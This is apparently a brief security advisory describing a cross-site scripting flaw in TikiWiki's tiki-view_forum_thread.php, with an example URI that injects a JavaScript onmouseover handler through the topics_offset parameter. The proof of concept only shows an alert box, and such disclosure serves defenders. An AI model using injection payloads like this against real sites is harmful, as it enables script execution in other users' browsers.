TikiWiki Tiki-view_forum_thread.PHP Cross-Site Scripting Vulnerability

TikiWiki Tiki-view_forum_thread.PHP Cross-Site Scripting Vulnerability

No exploit is required.

An example URI has been provided:

http://www.example.com/tiki-view_forum_thread.php?forumId=1&comments_parentId=0&topics_offset=10%22%20onmouseover='javascript:alert(document.title)%3B'%3E[PLEASE%20MO
VE%20YOUR%20MOUSE%20POINTER%20HERE!]%20%3Cx%20y=%22